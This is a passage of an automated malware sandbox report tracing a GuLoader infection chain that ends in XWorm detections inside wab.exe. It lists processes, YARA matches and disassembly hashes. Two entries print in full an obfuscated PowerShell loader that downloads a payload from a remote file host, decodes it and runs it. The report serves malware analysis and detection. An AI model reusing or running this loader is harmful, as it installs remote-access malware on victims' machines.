                                                                                                      2024-05-23 19:06:04 UTC2020INData Raw: 0c 04 46 28 0a 6c e8 9d 7b ff b0 5b 77 1a 4b c5 97 e2 1f 92 a0 0d 2c 46 bc d6 4c 95 e6 09 e2 9e 99 6f 6b 6a 75 f0 7a d5 42 01 0e be b7 4b 0f 92 09 ce 1b 2a c9 29 01 d0 74 b4 39 7f d3 b1 ef b5 ea 73 ff a8 79 4f c5 ea e2 96 78 d0 67 1c aa 41 f5 e6 b9 dc 62 ed f3 e3 cc 86 6f 2c 66 bc 16 97 60 f4 2b dd 3f 9e 54 d1 04 55 b5 fa d8 97 67 ce cb 2e 0b 86 49 df 3f a5 a9 ee 21 df 9a e8 89 f6 f9 cc 9e bb db a5 d2 ec 26 8f c7 02 d1 3e 05 37 b8 af 67 5f 9e 28 b9 f1 b3 7a 1a a6 ff 6f 57 bd 4c c2 1f 3c 15 3c 8b e4 5b 57 9c 50 73 6c 6c b1 28 7f 12 15 6b 42 46 58 17 0d bc 5d da ee 32 d4 28 36 65 b5 a1 73 73 8e 97 fb 35 4a 51 43 0b 22 d5 1f 67 0a 6a 03 f7 87 81 00 76 ae 00 d5 30 3e 0e 32 18 19 e8 6a 92 9e 39 ed b8 7a 1a 5b 9a c2 84 ef 67 0d 1e c4 37 b8 d9 b9 29 60 57 7d 5d
                                                                                                      Data Ascii: F(l{[wK,FLokjuzBK*)t9syOxgAbo,f`+?TUg.I?!&>7g_(zoWL<<[WPsll(kBFX]2(6ess5JQC"gjv0>2j9z[g7)`W}]


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:15:05:10
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
                                                                                                      Imagebase:0x7ff768c30000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:15:05:10
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:15:05:10
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:15:05:10
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:15:05:13
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
                                                                                                      Imagebase:0x7ff768c30000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:15:05:20
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans= tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara .chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide (Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif .owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften ,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91 ' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg ,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
                                                                                                      Imagebase:0xe90000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2188569981.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2181785367.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2189165327.000000000A036000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:15:05:21
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
                                                                                                      Imagebase:0x240000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:15:05:48
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                      Imagebase:0x760000
                                                                                                      File size:516'608 bytes
                                                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2900082947.0000000004FE6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 00007FFD9B8AAB16 Relevance: .5, Instructions: 472COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2670314072.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 839805165538b9d869701d1f15f4e0a8853ad9256b5637cdc3f2f15185933d05
                                                                                                        • Instruction ID: ab668243fba807d5d81c9c0a1684518b5b3b82f3b523b975663c002610e67396
                                                                                                        • Opcode Fuzzy Hash: 839805165538b9d869701d1f15f4e0a8853ad9256b5637cdc3f2f15185933d05
                                                                                                        • Instruction Fuzzy Hash: 46F1A730A09A8D8FEBA8DF28C8557F937E1FF58310F04426EE85DC76A5DB3499458B81
                                                                                                        Function 00007FFD9B8AB8C2 Relevance: .5, Instructions: 458COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2670314072.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bd2927f395338a0d3bab24bcecf467da3ff72b8b7d15777ce6ec08ef2895a78
                                                                                                        • Instruction ID: dfa59ec7cf9713985c3f3a56027f8b1de07e0878c7eb4859e2d39cf374e3829b
                                                                                                        • Opcode Fuzzy Hash: 8bd2927f395338a0d3bab24bcecf467da3ff72b8b7d15777ce6ec08ef2895a78
                                                                                                        • Instruction Fuzzy Hash: 6CE1C630A09A8D8FEBA8DF68C8657E977D1FF58310F04426ED84DC72A5DF74A9418B81
                                                                                                        Function 00007FFD9B974049 Relevance: .7, Instructions: 664COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2671780888.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1df348d5fec521f4da9e6871da6b190565005a57a4ce1c2b4f0af907b3663dad
                                                                                                        • Instruction ID: 646767d5f8dbfda4aad65624c2f28de57cab13e2109e6eeacd4f2ac3ce21139c
                                                                                                        • Opcode Fuzzy Hash: 1df348d5fec521f4da9e6871da6b190565005a57a4ce1c2b4f0af907b3663dad
                                                                                                        • Instruction Fuzzy Hash: FB225D62B1F6CA1FE766DB6848B52B87BE0EF56210B1A01FFD09DC72E3D91859058341
                                                                                                        Function 00007FFD9B97522D Relevance: .4, Instructions: 378COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2671780888.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aea0ed2f0a314bd0bae8fc82fbd51b90453d05e516806d742444e0e5c4fe221e
                                                                                                        • Instruction ID: 54292c692c5595276af4a8c9926b73fef4af131da71a7b3082424180d4b3c546
                                                                                                        • Opcode Fuzzy Hash: aea0ed2f0a314bd0bae8fc82fbd51b90453d05e516806d742444e0e5c4fe221e
                                                                                                        • Instruction Fuzzy Hash: 0EB13562B1EA8E5FEBE5DB6858A55B87BE1EF55310B1901BBD04CCB1E3DE08AD018341
                                                                                                        Function 00007FFD9B8AC020 Relevance: .3, Instructions: 279COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2670314072.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
